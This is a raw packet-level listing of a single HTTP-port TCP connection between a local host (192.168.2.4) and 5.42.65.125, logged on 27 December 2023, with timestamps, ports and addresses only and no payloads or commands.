Dec 27, 2023 18:12:25.541058064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541059971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541064978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541085005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541105986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541110039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541116953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541127920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541134119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541140079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541146994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541152000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541153908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541161060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541172028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541177034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541178942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541193008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541225910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541641951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541650057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541690111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541691065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541697979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541709900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541731119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541754007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541804075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541830063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541837931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541847944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541856050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541870117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541893005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541894913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541901112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541908979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541914940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541925907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541928053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541945934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541982889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541990042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542000055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542006969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542012930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542018890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542023897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542025089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542046070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542062044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542478085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542485952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542496920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542522907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542556047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542562962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542573929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542579889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542586088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542597055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542612076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542751074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542757988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542768002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542773008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542778969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542783976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542793989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542794943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542800903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542807102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542807102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542813063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542829990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542834997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542835951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542843103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542853117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542857885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542859077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542876959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542881012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542882919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542891979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542893887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542901039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542907953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.542917013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.542943001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543404102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543426037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543462992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543469906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543508053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543514013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543520927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543530941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543555021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543608904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543615103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543620110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543626070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543632030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543637991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543642044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543643951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543651104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543664932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543673992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543719053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543725967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543735981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543745995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543756962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543765068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543771982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543782949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.543807983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.543829918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544275045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544281960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544291973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544297934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544305086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544315100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544316053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544336081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544353008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544358015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544364929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544374943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544380903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544385910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544392109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544399977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544404030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544409990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544423103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544445038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544445992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544612885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544619083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544629097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544635057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544641018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544651031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544651985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544656992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544663906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544670105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544675112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544680119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544682026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544687986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544693947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.544694901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544712067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.544734001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545217991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545253038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545260906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545268059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545289993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545306921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545310020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545432091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545439959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545452118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545459032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545469046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545475960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545483112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545486927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545497894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545505047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545511961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545520067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545521975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545530081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545537949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545541048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545546055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545553923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545555115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545566082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545586109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545586109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545613050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545613050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.545958042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545965910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545975924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.545981884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546003103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546015978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546017885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546025991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546034098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546061039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546088934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546096087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546108007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546113968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546120882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546132088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546132088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546139956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546148062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546154976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546156883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546173096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546190977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546200037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546263933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546272039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546279907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546288013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546299934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546302080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546325922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546343088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546354055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546360970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546374083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546380043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546387911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546399117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.546413898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546446085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.546838999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547049999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547058105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547069073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547075033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547081947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547094107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547101021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547100067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547112942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547123909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547125101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547132969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547139883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547146082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547152042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547152996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547167063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547167063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547174931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547184944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547188997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547197104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547209024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547209024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547218084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547225952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547231913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.547235012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547255039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.547271967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.629255056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629264116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629290104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629297018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629304886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629477978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629484892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629497051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629503965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629511118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629518032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629525900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629539013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629545927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629551888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629564047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629570961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629578114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629585028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629592896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629605055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629612923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629618883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629631996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629638910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629646063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629652977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629664898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.629833937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630027056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630034924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630042076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630049944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630057096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630064011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630068064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630084991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630099058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630106926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630115032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630121946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630121946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630141973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630143881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630150080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630170107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630348921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630356073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630367994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630373955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630388021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630398035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630398035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630399942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630408049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630415916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630426884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630434036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630440950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630443096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630449057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630456924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630459070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630464077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630470037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630482912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630484104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630497932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630501032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630516052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630536079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630543947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630584002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630603075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630611897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630624056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630654097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.630681038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.630688906 CET	80	49738	5.42.65.125	192.168.2.4
